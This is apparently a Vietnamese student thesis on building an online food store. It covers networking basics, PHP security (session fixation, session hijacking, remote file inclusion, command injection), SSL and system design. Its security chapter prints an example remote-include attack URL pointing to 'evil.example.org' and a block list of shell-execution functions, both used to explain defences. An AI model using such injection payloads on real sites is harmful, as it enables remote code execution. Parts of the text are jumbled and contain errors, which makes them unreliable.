Đang tải... (xem toàn văn)
Xây dựng website giới thiệu và bán thực phẩm
WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM Lời mở đầu Cùng với phát triển không ngừng kỹ thuật máy tính mạng điện tử, cơng nghệ thơng tin cơng nghệ có đẳng cấp cao chinh phục hết đỉnh cao đến đỉnh cao khác Mạng Internet sản phẩm có giá trị lớn lao ngày trở nên công cụ thiếu, tảng cho truyền tải, trao đổi thơng tin toàn cầu Mạng Internet mang lại nhiều tiện ích hữu dụng cho người sử dụng, tiện ích phổ thơng Internet hệ thống thư điện tử (email), trò chuyện trực tuyến (chat), máy truy tìm liệu(search engine), dịch vụ thương chuyển ngân, dịch vụ y tế giáo dục chữa bệnh từ xa tổ chức lớp học ảo hay cửa hàng ảo Chúng cung cấp khối lượng thông tin dịch vụ khổng lồ Internet Sự phát triển công nghệ thông tin mở lĩnh vực mới, bước đột phá nghành khoa học đại Internet đại diện cho phát triển phổ biến rộng rãi khắp toàn cầu Người ta sử dụng internet để tìm hiểu cập nhật thơng tin như: thơng tin thời sự, văn hóa xã hội, thơng tin khoa học, kinh tế, thương mại, thể thao …vv Giờ đây, việc liên quan đến thông tin trở nên thật dễ dàng cho người sử dụng: cần có máy tính kết nối internet … giới tầm tay bạn cung cấp cho bạn vấn đề mà bạn quan tâm ra, có đầy đủ thơng tin, hình ảnh, âm video bạn cần… Truy cập internet, thực nhiều công việc với tốc độ nhanh chi phí thấp nhiều so với cách thức truyền thống Chính điều này, thúc đẩy khai sinh phát triển thương mại điện tử khắp giới, làm biến đổi đáng kể mặt văn hóa, nâng cao chất lượng sống người WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM Trong hoạt động sản xuất, kinh doanh, đây, thương mại điện tử khẳng định vai trò xúc tiến thúc đẩy phát triển doanh nghiệp Trong doanh nghiệp , nhà kinh doanh sử dụng Internet vũ khí để cạnh tranh kinh doanh quảng cáo giao dịch thương mại Hiện việc quảng cáo, bán hàng giao dịch thương mại mạng dần chiếm ưu thị trường Giải thích cho ưu : hình thái hoạt động thương mại phương pháp điện tử; việc trao đổi thông tin thương mại thơng qua phương tiện điện tử , nói chung không cần phải in giấy cơng đoạn q trình giao dịch Hiện nay, cơng sở thời gian làm việc gị bó tiếng ngày, thời gian để công nhân viên chức khơng có đủ để dành cho việc chợ hàng ngày.Cuối tuần họ thường mua thực phẩm cho tuần, liệu thực phẩm tươi ngon, đảm bảo vệ sinh không? Hãy đến với ĐICHỢ.VN để mua thực phẩm tươi ngon hàng ngày đến 10 phút cho việc chợ mà bước chân đâu Em xin trình bày cách thức quản lý website giúp cho người quản trị dễ dàng người quản lý việc quản lý, thay đổi, cập nhật thông tin trang web, quản lý hiệu khách hàng đơn đặt hàng mạng dễ dàng lựa chọn sản phẩm toán dễ dàng cho khách mua hàng Với ý tưởng này, với gợi ý hướng dẫn thầy Nguyễn Văn Tân, em thực đồ án “XÂY DỰNG WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM” nội dung trình bày sau WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM CHƯƠNG 1:TỔNG QUAN VỀ CÔNG NGHỆ INTERNET 1.1 Động lực thúc đẩy đời mơ hình mạng Client/Server : - Ngày với xu hướng mạng tồn cầu hố, liên lạc thơng tin qua lại máy theo mơ hình Client/Server ứng dụng quan mạng khơng thể thiếu hệ thống liên lạc thông tin Có nhiều dịch vụ hỗ trợ Internet theo mơ hình email, web, FPT, nhóm tin Usernet, telnet, truyền tập tin, đăng nhập từ xa, chat,… Các chương trình dịch vụ trình khách(Client) kết nối với trình chủ xa(Server) sau gởi yêu cầu đến trình chủ trình chủ xử lý yêu cầu sau gởi kết cho trình khách Thơng thường trình chủ phục vụ cho nhiều trình khách đến lúc - Vào thập niên 90, bắt đầu bùng nổ truy cập Web mạng hoá lĩnh vực nhiều quốc gia giới có Việt Nam Một vấn đề đặt cho nhà lập trình, nhà quản lý nhiều người sử dụng máy tính điều truy cập thơng tin Intranet hay Internet nhanh chóng, xác mà thơng tin hay liệu an tồn Lập trình mạng theo mơ hình Client/Server giải pháp an tồn cho nhà lập trình 1.2 Nguyên tắc hoạt động mạng theo mơ hình client/Server : - Mạng Client/Server đơn có tiêu chuẩn khơng có Client sử dụng tài nguyên Client khác Tài nguyên dùng chung (tài nguyên chính) đặt hay nhiều Server chuyên dụng theo dịch vụ E-mail, file server, chat, Web, fpt,…hay nói cách khác Client khơng nhìn thấy mà giao tiếp với Server Mơ hình Client/Server hữu dụng công ty hay tổ chức cần đến việc quản lý tài nguyên hay người sử dụng cách hiểu WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM - Thuật ngữ Server dùng để chương trình hỗ trợ dịch vụ truy xuất qua mạng Một Server nhận yêu cầu qua mạng thực cho dịch vụ trả kết cho nơi yêu cầu Với dịch vụ đơn giản nhất, yêu cầu gửi đến địa IP datagram Server trả lời đáp datagram khác Các Server thực cơng việc đơn giản đến phức tạp Ví dụ time-of-day Server đơn giản trả hành Client gởi tới Server thông tin Hay WebServer nhận yêu cầu từ trình duyệt (Borwser) để lấy trang web, Server lấy tập tin trang web trả cho trình duyệt - Mơ hình Client/Server thực việc phân tán xử lý máy tính Về chất công nghệ chia xử lý nhiều máy tính, máy tính xem Server thường dùng để lưu trữ tài nguyên để nhiều nơi truy xuất vào Các Server thụ động chờ để giải yêu cầu từ Client truy xuất đến chúng Thông thường, Server cài đặt chương trình ứng dụng Vì ưu điểm việc cài đặt Server chương trình ứng dụng chúng xử lý hệ máy tính hỗ trợ thông tin liên lạc theo giao thức TCP/IP hay giao thức thông dụng khác Như thế, Server cho dịch vụ cụ thể chạy hệ chia thời gian với chương trình khác, hay xử lý máy tính cá nhân WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM - Một chương trình ứng dụng trở thành Client gởi yêu cầu tới Server đợi lời giải đáp trả Cũng mà mơ hình Client/Server mở rộng tự nhiên tiến trình thơng tin liên lạc nội máy tính xa Intarnet/Internet Ứng dụng mơ hình Client/Server ứng dụng chia sẻ file(do tổ chức có nhu cầu chia sẻ thơng tin phận tổ chức dễ dàng nhanh chóng hơn) Trong ứng dụng thông tin chứa file đặt máy Server phòng ban Khi phịng ban khác có nhu cầu trao đổ thơng tin với phịng ban sử dụng máy tính khác(Client) kết nối với Server tải file cần thiết máy Client WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM Tóm lại : + Nhiệm vụ máy Client : thi hành dịch vụ cho người dùng, cách kết nối với chương trình ứng dụng máy Server, dựa vào chuỗi nhập để chuyển yêu cầu đến Server nhân kết trả từ Server hiển thị thông tin nhân cho người dùng + Nhiệm vụ máy Server : lắng nghe kết nối đến cổng liên quan đến giao thức mà Server phục vụ Khi máy Client khởi tạo kết nối, máy Server chấp nhận tạo luồng riêng biệt phục vụ cho máy Client Ngồi máy Server phải quản lý hoạt động mạng phân chia tài nguyên chung(hay gọi tài nguyên mạng) việc trao đổi thông tin Client,… Máy Server đóng vai trị máy trạm (Client) trường hợp gọi máy Server “không tuý” Server phải đảm bảo hai yêu cầu chức Server : cho phép truyền liệu nhanh chóng bảo đảm tính an tồn, bảo mật khơng mát liệu + Có thể nói mơ hình Client/Server mơ hình ảnh hưởng lớn tới ngành công nghệ thông tin Mơ hình biến máy tính riêng lẻ có khả xử lý thấp thành mạng máy chủ(Server) máy trạm(Workstation) có khả xử lý gấp hàng ngàn lần máy tính mạnh Mơ hình cịn giúp cho việc giải tốn phức tạp cách dễ dàng hơn, cách phân chia toán lớn thành nhiều toán giải toán Nhưng quan trọng hết, việc giải toán lớn mà cách thức giải toán + Ưu điểm: - Các tài nguyên quản lý tập trung - Có thể tạo kiểm sốt chặt chẽ truy cập file liệu - Giảm nhẹ gánh nặng quản lý máy Client - Bảo mật back up liệu từ Server + Nhược điểm: WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM - Khá đắt tiền so với mạng ngang hàng(peer), chủ yếu giá để lắp đặt Server cao - Server trở thành điểm tối yếu hệ thống, nghĩa Server hỏng tồn hệ thống chết, tính đề kháng lỗi u cầu quan trọng mơ hình 1.3 Các khái niệm bạn mạng : Ngày nay, quen thuộc mạng điện thoại việc trao đổi thông tin, tương tự mạng máy tính sử dụng số nguyên tắc sau + Bảo đảm thông tin không bị hay thất lạc đường truyền + Thông tin truyền nhanh chóng kịp thời + Các máy tính mạng phải nhận biết +Cách đặt tên mạng cách xác định đường truyền mạng phải tuân theo chuẩn thống - Các nguyên tắc có vẽ quan trọng Nhưng cần phải nối mạng? có nhiều lý kể lý sau: + Tăng hiệu làm việc + Xây dựng mơ hình làm việc thống tập trung cho tất người sử dụng mạng + Cho phép đưa tất vấn đề cần giải lên mạng dạng thảo luận theo quan điểm phóng khống, thoải mái phải đối thoại khơng khí gị bó + loại bỏ thơng tin thừa, trùng lặp - Mạng đơn giản gồm hai máy tính cáp qua cổng máy in để truyền file, phức tạp chia mạng thành loại sau: WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM • Mạng cục bộ(LAN-Wide Area Network) : mạng đơn giản giới mạng, hệ thống bao gồm nút máy tính nối kết với dây cáp qua card giao tiếp mạng phạm vi nhỏ vị trí định Tuỳ theo cách giao tiếp nút mạng, người ta chia làm hai loại : • Mạng ngang hàng (peer to peer [Windows workgroups]) : hệ thống mà nút sử dụng tài nguyên nút khác Nghĩa máy tính mạng ngang vai trị, khơng có máy đóng vai trò trung tâm Marry truy xuất tài nguyên qua mạng • Mạng khách chủ (client/server) : có nút mạng đảm nhiệm vai trò trạm dịch vụ (server) máy khác trạm làm việc (workstation) sử dụng tài nguyên trạm dịch vụ Server chứa hầu hết tài nguyên quan trọng mạng phân phối tài nguyên tới Client WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM Mơ hình mạng Client/Server Mạng đô thị(Metropolitan Area Networks - viết tắt Man): Là mạng đặt phạm vi đô thị trung tâm kinh tế-xã hội có bán kính khoản 100km trở lại Là mạng với đường truyền thuê bao tốc độ cao qua mạng điện thoại thông qua phương tiện khác radio, microway, hay thiết bị truyền liệu bàng laser MAN cho phép người dùng mạng nhiều vị trí địa lý khác truy cập tài nguyên mạng theo cách thông thường mạng LAN Tuy nhiên nhìn phương diện tổng thể MAN mạng cục Mạng diện rộng(WAN – Wide Area Networks): phạm vi mạng vượt qua biên giới quốc gia chí lục địa WAN có nhiệm vụ kết nối tất mạng LAN MAN xa thành mạng có đường truyền tốc độ cao Tốc độ truy cập tài nguyên mạng WAN thường bị hạn chế dung lượng truyền đường điện thoại thuê bao(phần lớn tuyến điện thoại số mức 56 kilobits/s) chi phí thuê bao đắt vấn đề công ty hay tổ chức muốn thiết lập mạng MAN cho cơng ty WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM • Mạng Internet tập hợp gồm hàng vạn mạng (LAN, MAN WAN)trên khắp giới kết nối với qua router(là thiết bị phân tuyến luồn liệu mạng) tạo thành mạng chung toàn cầu theo mơ hình client/Server, phát triển vào đầu thập niên 70 Internet công nghệ thông tin liên lạc mới, đại, tác động sâu sắc vào xã hội sống chúng ta, phương tiện cần thiết điện thoại hay tivi, mức độ bao quát Chẳng hạn điện thoại cho phép trao đổi thông tin qua âm thanh, giọng nói Với Tivi, thơng tin nhận trực quan Cịn Internet đưa vào giới có tầm nhìn rộng bạn làm thứ: viết thư, đọc báo, xem tin, giải trí, tra cứu chí cịn thực phi vụ làm ăn, ….Vì Internet mạng mạng, tức bao gồm nhiều mạng máy tính kết nối lại với nhau, Số lượng máy tính nối mạng số lượng người truy cập vào mạng Internet toàn giới ngày tăng lên nhanh chóng Đặc biệt từ năm 1993 trở đi, mạng Internet không cho phép chuyển tải thơng tin nhanh chóng mà cịn giúp cung cấp thơng tin, diễn đàn thư viện tồn cầu Các thơng tin đặt rải rác tồn cầu truyền thơng với thiết bị Modem đường dây điện thoại WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM liệu đầu vào lọc escaping xuất tránh lỗi SQL injection lọc escaping nhóm hàm *_escape_string() 4.3.3 Bảo mật Session Có hai kiểu cơng session phổ biến session cố định(session fixation) cướp session ( session hijacking) Khi người triệu gọi trang web lần ứng dụng gọi session_start() để tạo sesion cho user PHP tự động sinh ngẫu nhiên định danh khác cho user Và sau send tạo cookies với tên mặc định PHPSESSID bạn thay đổi tên mặc định cách thay đổi php.ini dùng hàm session_name() Từ lần viếng thăm sau định danh user cookies Tuy nhiên gán session qua chuỗi truy vấn Đây cách dễ ràng để cơng session fixation kẻ cơng thay đổi giá trị PHPSESSID Cách phổ biến lưu trữ link ứng dụng bạn nối thêm session id sau dụ ngưòi dùng kích vào Click here Trong truy cấp thường hay lưu thông tin đăng nhập session Nếu user đăng nhập vào với session id kẻ cơng truy cập với session id truy cập vào thay đổi thơng tin account Quan trọng tiến tới chiếm quyền điều khiển acount quản trị Chúng ta xuất tất session id tất user hàm session_regenerate_id() Mã: WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM session_start(); // If the user login is successful, regenerate the session ID if (authenticate()) { session_regenerate_id(); } Cách làm bảo vệ user cách công session fixed dễ dàng đề nghị truy cập kẻ công Nó khơng giúp chống lại kiểu cơng phổ biến khác kiểu session hijacking Đúng chung mà thời hạn mô tả có nghĩa kẻ công kiếm session id user hữu ích Ví dụ: user tin đăng nhập session id định nghĩa lại có session sẩy kẻ công mà phát ID cố gắng truy cập vào session user ? Session ID để định danh yêu cầu khác user khác yêu cầu đầư trợ giúp đặc biệt không thay đổi yêu cầu đầu khác không chắn(chiếm truờng hợp ít) user từ trình duyệt chuyển thành khác sử dụng phiên làm việc yêu cầu đầu để xác định rõ kiểu công session hijacking Sau user đăng nhập lưu tác nhân user (User-Agent ) vào session: $_SESSION[’user_agent’] = $_SERVER[’HTTP_USER_AGENT’]; Và sau trang load lần hai kiểm tra chắn User-Agent không thay đổi Nếu bị thay đổi lên cho đăng nhập lại Mã: if ($_SESSION[’user_agent’] != $_SERVER[’HTTP_USER_AGENT’]) { // Force user to log in again exit; } WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM 4.3.4 Bảo mật Filesystem PHP có khả truy cập trực tiếp hệ thống files thực lệnh shell, cung cấp cho nhà phát triển sức mạnh lớn, thực nguy hiểm làm hỏng liệu đầu cuối comand line Một lần liệu lại phải lọc 4.3.4.1 Thực thi mã lệnh từ xa(remote Code Injection ) Khi khai báo chèn vào file include requre ý cẩn thận sử dụng liệu “hỏng” để tạo khai báo bao hàm(include) động liệu nhập từ client, lỗi dễ dàng cho phép hacker thực công từ xa Một công từ xa xẩy kẻ cơng thực đoạn mã mà họ chọn ứng dụng Điều giúp cho kẻ cơng tàn phá ứng dụng lẫn hệ thống Ví dụ: nhiều ứng dụng cho phép tạo sử dụng chuỗi truy vấn vào cấu trúc mục ứng dụng ví dụ :http://example.org/?section=news Một ứng dụng cấu trúc inclue đề chèn mã news vào ứng dụng: clude "{$_GET[’section’]}/data.inc.php"; sử dụng URL truy cập vào mục news/data.inc.php Tuy nhiên phải cân nhắc kỹ chuyện xẩy kẻ cơng thay đổi chuỗi truy vấn có hại cho site: http://example.org/?section=http%3A%2F%2Fevil.example.org %2Fattack.inc%3F liệu nguy hiểm đuợc include vào hệ thống kết cách làm include "http://evil.example.org/attack.inc?/data.inc.php"; attack.inc inclue vào hệ thống thực thi mã đó, kẻ cơng làm điều mà họ muốn cẩn để attack.inc when kẻ cơng chiếm tất quyền mà họ muốn Ví dụ: Mã: WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM $clean = array(); $sections = array(’home’, ’news’, ’photos’, ’blog’); if (in_array($_GET[’section’], $sections)) { $clean[’section’] = $_GET[’section’] }else { $clean[’section’] = ’home’ } include "{clean[’section’]}/data.inc.php"; 4.3.4.2 Các lệnh ijnection Một site cho phép include liệu động vào file nguy hiểm, cho phép user thực thi lệnh hệ thống PHP cung cấp các hàm exec(), system() passthru() giúp thực thi lệnh hệ thống Việc lọc whilelist giảm thiệu câu lệnh có hại cho hệ thống Php cung cấp hàm escapeshellcmd() and escapeshellarg() Đê bỏ cấu lệnh escape shell cho hệ thống WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM 4.4 Shared Hosting Có nhiều vấn đề nẩy sinh sử dụng host dùng chung, trước PHP giải vấn đề thị safe_mode Tuy nhiên sai cố gắng dùng để phân cấp mức PHP Safe_mode khơng sẵn sàng PHP Có thị quan trong việc chia sẻ hosting: open_basedir disable_functions disable_classes Ba thị không phụ thuộc vào safe_mode chúng thể sẵn sàng tương lai Open_basedir thị giới hạn truy cập đến truy cập file cấu trúc thư mục PHP cố gắng mở file open() include tồn rõ thư mục open_basedir khơng khơng mở file Có thể khai báo php.ini hàm open_basedir cho cho host ảo PHP cho phép mở file địa chỉ/home/user/www and /usr/local/lib/php (cái mặc định thư viện PEAR): Mã: DocumentRoot /home/user/www ServerName www.example.org php_admin_value open_basedir "/home/user/www/:/usr/local/lib/php/" Chỉ thị disable_functions disable_classes tương tự cho phép disable hàm lớp hàm lớp danh sách khơng có chức cho hệ thống bạn thay đổi thơng số php.ini sau: ; Disable functions disable_functions = exec,passthru,shell_exec,system ; Disable classes WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM disable_classes = DirectoryIterator,Directory 4.5 Giao thức bảo mật phổ biến thương mại điện tử Secure Socket Layer (SSL) gì? SSL giao thức đa mục đích thiết kế để tạo giao tiếp hai chương trình ứng dụng cổng định trước (socket 443) nhằm mã hố tồn thơng tin đi/đến, mà ngày sử dụng rộng rãi cho giao dịch điện tử truyền số hiệu thẻ tín dụng, mật khẩu, số bí mật cá nhân (PIN) Internet Giao thức SSL hình thành phát triển năm 1994 nhóm nghiên cứu Netscape dẫn dắt Elgammal ngày trở thành chuẩn bảo mật thực hành mạng Internet Phiên SSL 3.0 tiếp tục bổ sung hoàn thiện Tương tự SSL, giao thức khác có tên PCT - Private Communication Technology đề xướng Microsoft sử dụng rộng rãi mạng máy tính chạy hệ điều hành Windows NT Ngoài ra, chuẩn IETF (Internet Engineering Task Force) có tên TLS (Transport Layer Security) dựa SSL hình thành xuất khuôn khổ nghiên cứu IETF Internet Draft tích hợp hỗ trợ sản phẩm Netscape Giao thức SSL làm việc nào? Điểm SSL thiết kế độc lập với tầng ứng dụng để đảm bảo tính bí mật, an tồn chống giả mạo luồng thơng tin qua Internet hai ứng dụng bất kỳ, thí dụ webserver trình duyệt khách (browsers), sử dụng rộng rãi nhiều ứng dụng khác mơi trường Internet Tồn chế hoạt động hệ thống thuật toán mã hoá sử dụng SSL phổ biến cơng khai, trừ khố chia xẻ tạm thời (session key) sinh thời điểm trao đổi hai ứng dụng tạo ngẫu nhiên bí mật người quan sát mạng máy tính Ngồi ra, giao thức SSL cịn đỏi hỏi ứng dụng chủ phải chứng thực đối tượng lớp thứ ba (CA) thông qua giấy chứng thực điện tử (digital certificate) dựa mật mã cơng khai (thí dụ RSA) Sau ta xem xét cách khái quát chế hoạt động SSL để phân tích cấp độ an tồn khả áp dụng ứng dụng nhạy cảm, đặc biệt ứng dụng thương mại toán điện tử Giao thức SSL dựa hai nhóm giao thức giao thức “bắt tay” (handshake protocol) giao thức “bản ghi” (record protocol) Giao thức bắt tay xác định tham số giao dịch hai đối tượng có nhu cầu trao đổi thơng tin liệu, cịn giao thức ghi xác định khn dạng cho tiến hành mã hoá truyền tin hai chiều hai đối tượng Khi hai ứng dụng WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM máy tính, thí dụ trình duyệt web máy chủ web, làm việc với nhau, máy chủ máy khách trao đổi “lời chào” (hellos) dạng thông điệp cho với xuất phát chủ động từ máy chủ, đồng thời xác định chuẩn thuật tốn mã hố nén số liệu áp dụng hai ứng dụng Ngoài ra, ứng dụng cịn trao đổi “số nhận dạng/khố theo phiên” (session ID, session key) cho lần làm việc Sau ứng dụng khách (trình duyệt) u cầu có chứng thực điện tử (digital certificate) xác thực ứng dụng chủ (web server) Chứng thực điện tử thường xác nhận rộng rãi quan trung gian (là CA -Certificate Authority) RSA Data Sercurity hay VeriSign Inc., dạng tổ chức độc lập, trung lập có uy tín Các tổ chức cung cấp dịch vụ “xác nhận” số nhận dạng công ty phát hành chứng cho công ty chứng nhận dạng (identity) cho giao dịch mạng, máy chủ webserver Sau kiểm tra chứng điện tử máy chủ (sử dụng thuật tốn mật mã cơng khai, RSA trình máy trạm), ứng dụng máy trạm sử dụng thông tin chứng điện tử để mã hố thơng điệp gửi lại máy chủ mà có máy chủ giải mã Trên sở đó, hai ứng dụng trao đổi khố (master key) - khố bí mật hay khố đối xứng - để làm sở cho việc mã hoá luồng thông tin/dữ liệu qua lại hai ứng dụng chủ khách Toàn cấp độ bảo mật an toàn thông tin/dữ liệu phụ thuộc vào số tham số: (i) số nhận dạng theo phiên làm việc ngẫu nhiên; (ii) cấp độ bảo mật thuật toán bảo mật áp dụng cho SSL; (iii) độ dài khố (key length) sử dụng cho lược đồ mã hố thơng tin Các thuật tốn mã hố xác thực SSL sử dụng bao gồm (phiên 3.0): DES - chuẩn mã hoá liệu (ra đời năm 1977), phát minh sử dụng phủ Mỹ DSA - thuật tốn chữ ký điện tử, chuẩn xác thực điện tử), phát minh sử dụng phủ Mỹ KEA - thuật toán trao đổi khoá), phát minh sử dụng phủ Mỹ MD5 - thuật tốn tạo giá trị “băm” (message digest), phát minh Rivest; RC2, RC4 - mã hố Rivest, phát triển cơng ty RSA Data Security; RSA - thuật tốn khố cơng khai, cho mã hoá va xác thực, phát triển Rivest, Shamir Adleman; RSA key exchange - thuật toán trao đổi khoá cho SSL dựa thuật toán RSA; WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM SHA-1 - thuật tốn hàm băm an tồn, phát triển sử dụng phủ Mỹ SKIPJACK - thuật toán khoá đối xứng phân loại thực phần cứng Fortezza, sử dụng phủ Mỹ 10.Triple-DES - mã hoá DES ba lần Cơ sở lý thuyết chế hoạt động thuật toán sử dụng bảo mật bên phổ biến rộng rãi công khai, trừ giải pháp thực ứng dụng thực hành vào sản phẩm bảo mật (phần cứng, phần dẻo, phần mềm) CHƯƠNG 5: XÂY DỰNG VÀ THIẾT KẾ WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM 5.1 Phân tích thiết kế hệ thống “Xây dựng website giới thiệu bán hàng mạng internet” Ở website giới thiệu bán thực phẩm mạng internet đề tài mà chủ yếu xử lý q trình mua bán hàng hóa cửa hàng với khách hàng người sử dụng internet.Chúng ta hiểu bán WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM hàng bán hàng thật thông qua hàng ảo,khách hàng gián tiếp mua hàng.Vậy nhiệm vụ đề làm đáp ứng đầy đủ nhu cầu cho khách hàng Hoạt động cửa hàng ảo bao gồm hai hoạt động : hoạt động khách hàng hoạt động người quản trị Hoạt động khách hàng: • Một khách hàng tham quan cửa hàng, họ đặt vấn đề cửa hàng bán gì, thơng tin mặt hàng bán, giá hình thức tốn.Do để đáp ứng nhu cầu tối thiểu trên, cửa hàng ảo phải đảm bảo cung cấp thông tin cần thiết, có giá trị dễ thao tác.Mặt hàng bán phải có hình ảnh, giá cả,nơi sản xuất thông tin liên quan đến mặt hàng • Khách hàng vào cửa hàng ảo(website) để tìm kiếm sản phẩm cần mua đặt hàng với cửa hàng.khách hàng tìm mặt hàng mà cần theo tên hàng • Khách hàng thành viên cần nhập tên đăng nhập mật để đăng nhập hệ thống mua hàng • Nêu lần khách hàng đến cửa hàng khách hàng cần đăng ký thành viên để mua hàng,trong khách hàng khai họ tên,thơng tin địa chỉ…tên sử dụng mật khách hàng • Khi khách hàng tiếp tục mua hàng, mặt hàng mà khách hàng lựa chọn thêm vào giỏ mua hàng khách hàng WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM • Khách hàng cập nhật sản phẩm giỏ hàng muốn mua thêm sản phẩm loại,hay xóa sản phẩm giỏ hàng khơng muốn sản phẩm • Khi khách hàng sẵn sàng hoàn thành đơn hàng mặt hàng mà khách hàng có giỏ mua hàng chuyển vào đơn đặt hàng thực đặt hàng với cửa hàng ,sau giỏ mua hàng rỗng Hoạt động người quản trị: Người quản trị ngồi việc nhận thơng tin từ khách hàng cịn phải đưa thơng tin mặt hàng bán lên cửa hàng ảo(website).Hoạt động người quản trị phân nhiệm vụ sau: • Hướng dẫn giới thiệu mặt hàng:Khách hàng tham quan cửa hàng thường đặt câu hỏi :“Cửa hàng bạn bán gì, có tơi cần hay khơng? ” Phải nhanh chóng đưa khách hàng tới nơi có mặt hàng họ cần, nhiệm vụ nhà quản lý.Việc lưu trữ thông tin mặt hàng sở liệu trực tuyến, sở liệu chứa thông tin mặt hàng : tên mặt hàng , loại mặt hàng, thơng tin mơ tả, hình ảnh, giá mặt hàng,… • Quản lý mặt hàng : người quản lý bổ sung, loại bỏ cập nhật mặt hàng để phù hợp với tình hình hoạt động cửa hàng cà nhu cầu thị hiếu khách hàng……… Cung cấp giỏ hàng cho khách hàng : Khách hàng cảm thấy thoải mái duyệt qua tồn cửa hàng trực tuyến mà khơng bị gián đoạn đâu phải lo định xem có mua mặt hàng hay khơng, kết thúc việc mua hàng, lựa chọn mặt hàng, thêm loại bỏ mặt hàng khỏi giỏ hàng ấn định số lượng cho mặt hàng WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM • Theo dõi khách hàng: Hàng mua?là câu hỏi đặt lúc nhiều khách hàng mua hàng cửa hàng ảo(website) • Nhận đơn đặt hàng: Sau khách hàng kết thúc giao dịch, đơn hàng tổng hợp lại gửi qua phận khác : kế toán , kinh doanh…ngoài sau thời gian định, nhà quản lý sử lý đơn đặt hàng cũ cần • Bán hàng xúc tiến khuyến mại: Có hàng kho chuyện bày bán vấn đề Ở bày bán đơn giản , mặt hàng bày bán thông qua loại mặt hàng cửa hàng ảo(website) Việc ưu đãi khách hàng thường xuyên đặt mua với số lượng nhiều việc cần thiết đồng thời thông tin khuyến mại kèm theo mặt hàng để khách hàng biết • Quản lý xử lý đơn đặt hàng: +Quản lý đơn hàng mà khách hàng gửi + Xóa đơn hàng + Thành lập hóa đơn cho khách hàng giao hàng… 5.1.2 Thiết kế hệ thống Biểu đồ chức : WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM Sơ đồ vật lý: WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM Các tiến trình: WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM Một số sơ đồ luồng liệu : Sơ đồ : DFD Mức 1- Quản lý đơn hàng WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM Sơ đồ : DFD mức 1- Quản lý sản phẩm ... gợi ý hướng dẫn thầy Nguyễn Văn Tân, em thực đồ án “XÂY DỰNG WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM” nội dung trình bày sau WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM CHƯƠNG 1:TỔNG QUAN VỀ CÔNG NGHỆ INTERNET... cách click vào siêu liên kết tương ứng directory-listing WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM CHƯƠNG III: KHÁI NIỆM VỀ THƯƠNG MẠI ĐIỆN TỬ 3.1 Giới thiệu thương... /research/astronomy/index.htm (secure HTTP) gopher:// WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM ftp:// orion.bureau.gov /stars/alpha quadrant/startlist.txt WEBSITE GIỚI THIỆU VÀ BÁN THỰC PHẨM + Web server trả lời yêu cầu
